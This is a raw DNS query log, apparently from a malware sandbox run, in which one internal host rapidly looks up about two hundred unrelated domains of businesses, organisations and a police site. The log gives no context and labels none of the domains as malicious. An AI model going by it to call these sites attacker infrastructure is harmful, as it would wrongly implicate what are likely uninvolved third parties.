                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.490833998 CET192.168.2.58.8.8.80xbb07Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.588608980 CET192.168.2.58.8.8.80x1f29Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.124109983 CET192.168.2.58.8.8.80xb3bStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.262554884 CET192.168.2.58.8.8.80x6228Standard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.292316914 CET192.168.2.58.8.8.80xfb89Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.414205074 CET192.168.2.58.8.8.80x74b2Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.116023064 CET192.168.2.58.8.8.80x3c4fStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.135600090 CET192.168.2.58.8.8.80xe9f6Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.235734940 CET192.168.2.58.8.8.80x3c7bStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.264477015 CET192.168.2.58.8.8.80x6cfcStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.302686930 CET192.168.2.58.8.8.80xbfb4Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.350836992 CET192.168.2.58.8.8.80xd60aStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.353204012 CET192.168.2.58.8.8.80x99b1Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.353204012 CET192.168.2.58.8.8.80x4b67Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.355393887 CET192.168.2.58.8.8.80x74d8Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.363656044 CET192.168.2.58.8.8.80x3f6fStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.364295006 CET192.168.2.58.8.8.80x2054Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.372359991 CET192.168.2.58.8.8.80x5ddfStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.445255041 CET192.168.2.58.8.8.80xb45cStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.463488102 CET192.168.2.58.8.8.80xc2c8Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.476273060 CET192.168.2.58.8.8.80x8738Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.490072966 CET192.168.2.58.8.8.80xc053Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.551182985 CET192.168.2.58.8.8.80xb61fStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.574898005 CET192.168.2.58.8.8.80x2422Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.599595070 CET192.168.2.58.8.8.80xc68aStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.796968937 CET192.168.2.58.8.8.80x8b28Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.028408051 CET192.168.2.58.8.8.80x6dcStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.058603048 CET192.168.2.58.8.8.80xde4eStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.161330938 CET192.168.2.58.8.8.80x6b63Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.173060894 CET192.168.2.58.8.8.80xfef7Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.236849070 CET192.168.2.58.8.8.80xb53dStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.344588995 CET192.168.2.58.8.8.80xcec4Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.511332989 CET192.168.2.58.8.8.80xf6a3Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.521090031 CET192.168.2.58.8.8.80xa026Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.529396057 CET192.168.2.58.8.8.80xa1fbStandard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.607305050 CET192.168.2.58.8.8.80x2422Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.618624926 CET192.168.2.58.8.8.80x4951Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.712507010 CET192.168.2.58.8.8.80xc5ceStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.725518942 CET192.168.2.58.8.8.80x3addStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.787333012 CET192.168.2.58.8.8.80x7e48Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.794121027 CET192.168.2.58.8.8.80x1fb9Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.841975927 CET192.168.2.58.8.8.80xb022Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.853081942 CET192.168.2.58.8.8.80xa20cStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.021065950 CET192.168.2.58.8.8.80x4973Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.036798954 CET192.168.2.58.8.8.80x295bStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.082892895 CET192.168.2.58.8.8.80xf3aaStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.107647896 CET192.168.2.58.8.8.80xde4eStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.134226084 CET192.168.2.58.8.8.80xe7f6Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.152291059 CET192.168.2.58.8.8.80x94a2Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.262603045 CET192.168.2.58.8.8.80xfe0dStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.276850939 CET192.168.2.58.8.8.80xe42eStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.328819036 CET192.168.2.58.8.8.80xe498Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.368292093 CET192.168.2.58.8.8.80xc003Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.461682081 CET192.168.2.58.8.8.80x270eStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.477440119 CET192.168.2.58.8.8.80x3fabStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.579271078 CET192.168.2.58.8.8.80x566bStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.692147017 CET192.168.2.58.8.8.80xcec4Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.692461967 CET192.168.2.58.8.8.80xe2c1Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.727322102 CET192.168.2.58.8.8.80x3d55Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.760837078 CET192.168.2.58.8.8.80x7904Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.967428923 CET192.168.2.58.8.8.80xf4d7Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.158725977 CET192.168.2.58.8.8.80x3685Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.241908073 CET192.168.2.58.8.8.80xc25Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.244235039 CET192.168.2.58.8.8.80x5835Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.247451067 CET192.168.2.58.8.8.80xd1d5Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.376749039 CET192.168.2.58.8.8.80xd19fStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.463282108 CET192.168.2.58.8.8.80xbfaStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.497752905 CET192.168.2.58.8.8.80x2557Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.498342037 CET192.168.2.58.8.8.80x4436Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.498929977 CET192.168.2.58.8.8.80x25eStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.500669956 CET192.168.2.58.8.8.80x8578Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.502751112 CET192.168.2.58.8.8.80xe889Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.527184010 CET192.168.2.58.8.8.80xabbStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.530149937 CET192.168.2.58.8.8.80x9befStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.556090117 CET192.168.2.58.8.8.80xf9ceStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.578926086 CET192.168.2.58.8.8.80x6bb0Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.584454060 CET192.168.2.58.8.8.80x367aStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.643731117 CET192.168.2.58.8.8.80xf29bStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.648129940 CET192.168.2.58.8.8.80x8358Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.649184942 CET192.168.2.58.8.8.80xac8aStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.713112116 CET192.168.2.58.8.8.80x59a0Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.763083935 CET192.168.2.58.8.8.80x2794Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.886126995 CET192.168.2.58.8.8.80x6cacStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.888442993 CET192.168.2.58.8.8.80x5bffStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.900063992 CET192.168.2.58.8.8.80x2e6Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.965287924 CET192.168.2.58.8.8.80xb937Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.016541004 CET192.168.2.58.8.8.80x189Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.163072109 CET192.168.2.58.8.8.80x1c33Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.221354008 CET192.168.2.58.8.8.80xf6eaStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.221522093 CET192.168.2.58.8.8.80xa2c1Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.225771904 CET192.168.2.58.8.8.80xdca2Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.242266893 CET192.168.2.58.8.8.80x875dStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.300415039 CET192.168.2.58.8.8.80x7702Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.309741020 CET192.168.2.58.8.8.80x5a53Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.317176104 CET192.168.2.58.8.8.80x808cStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.320718050 CET192.168.2.58.8.8.80x7a41Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.326384068 CET192.168.2.58.8.8.80xc785Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.327828884 CET192.168.2.58.8.8.80x999bStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.338706970 CET192.168.2.58.8.8.80x92a0Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.353743076 CET192.168.2.58.8.8.80x1f57Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.367548943 CET192.168.2.58.8.8.80xabdfStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.370539904 CET192.168.2.58.8.8.80xf167Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.371011972 CET192.168.2.58.8.8.80xce01Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.371011972 CET192.168.2.58.8.8.80x5d94Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.451455116 CET192.168.2.58.8.8.80x70d9Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.487976074 CET192.168.2.58.8.8.80x81bStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.561467886 CET192.168.2.58.8.8.80x9befStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.567950010 CET192.168.2.58.8.8.80x5b5Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.575794935 CET192.168.2.58.8.8.80x25f1Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.625174999 CET192.168.2.58.8.8.80x1008Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.630435944 CET192.168.2.58.8.8.80xb44cStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.630649090 CET192.168.2.58.8.8.80xd733Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.630776882 CET192.168.2.58.8.8.80x3111Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.631478071 CET192.168.2.58.8.8.80x63f1Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.767142057 CET192.168.2.58.8.8.80x32d2Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.774626017 CET192.168.2.58.8.8.80x3e6bStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.780457020 CET192.168.2.58.8.8.80x13d7Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.796725988 CET192.168.2.58.8.8.80x96adStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.859818935 CET192.168.2.58.8.8.80x4517Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.861306906 CET192.168.2.58.8.8.80x5b93Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.976490974 CET192.168.2.58.8.8.80x217aStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.984052896 CET192.168.2.58.8.8.80x8702Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.987839937 CET192.168.2.58.8.8.80x31f2Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.988002062 CET192.168.2.58.8.8.80x1e6eStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.992511034 CET192.168.2.58.8.8.80x8933Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.999097109 CET192.168.2.58.8.8.80x9dddStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.016093016 CET192.168.2.58.8.8.80x493Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.033155918 CET192.168.2.58.8.8.80xe54bStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.086384058 CET192.168.2.58.8.8.80x702fStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.306495905 CET192.168.2.58.8.8.80x1295Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.319221020 CET192.168.2.58.8.8.80x3efcStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.319638014 CET192.168.2.58.8.8.80x6f40Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.430085897 CET192.168.2.58.8.8.80x6797Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.431973934 CET192.168.2.58.8.8.80x6015Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.432862043 CET192.168.2.58.8.8.80x19d3Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.439960003 CET192.168.2.58.8.8.80x8f3Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.473232985 CET192.168.2.58.8.8.80xe06aStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.520498991 CET192.168.2.58.8.8.80x92cStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.543596983 CET192.168.2.58.8.8.80xd718Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.557353973 CET192.168.2.58.8.8.80x2549Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.557414055 CET192.168.2.58.8.8.80x1f92Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.562973976 CET192.168.2.58.8.8.80x9befStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.652859926 CET192.168.2.58.8.8.80x6f19Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.664047956 CET192.168.2.58.8.8.80x1479Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.781209946 CET192.168.2.58.8.8.80xbaa2Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.785361052 CET192.168.2.58.8.8.80x473dStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.794055939 CET192.168.2.58.8.8.80x4d34Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.855761051 CET192.168.2.58.8.8.80x9bd6Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.867013931 CET192.168.2.58.8.8.80x3953Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.998012066 CET192.168.2.58.8.8.80x80d3Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.001990080 CET192.168.2.58.8.8.80x3563Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.003176928 CET192.168.2.58.8.8.80x3ee2Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.112346888 CET192.168.2.58.8.8.80x4110Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.303401947 CET192.168.2.58.8.8.80x61b4Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.365355015 CET192.168.2.58.8.8.80x44bcStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.408618927 CET192.168.2.58.8.8.80x1438Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.567506075 CET192.168.2.58.8.8.80x5bd9Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.721471071 CET192.168.2.58.8.8.80x454dStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.721472025 CET192.168.2.58.8.8.80xa34cStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.721556902 CET192.168.2.58.8.8.80xf029Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.725559950 CET192.168.2.58.8.8.80x3278Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.755033016 CET192.168.2.58.8.8.80x8224Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.765127897 CET192.168.2.58.8.8.80xf388Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.773022890 CET192.168.2.58.8.8.80xfe80Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.787842989 CET192.168.2.58.8.8.80x707cStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.802684069 CET192.168.2.58.8.8.80x26a1Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.817986012 CET192.168.2.58.8.8.80x166Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.941992044 CET192.168.2.58.8.8.80x2f17Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.944516897 CET192.168.2.58.8.8.80xdcbcStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.952212095 CET192.168.2.58.8.8.80xd4cStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.017702103 CET192.168.2.58.8.8.80x295dStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.102921009 CET192.168.2.58.8.8.80x14cdStandard query (0)adeesa.netA (IP address)IN (0x0001)false
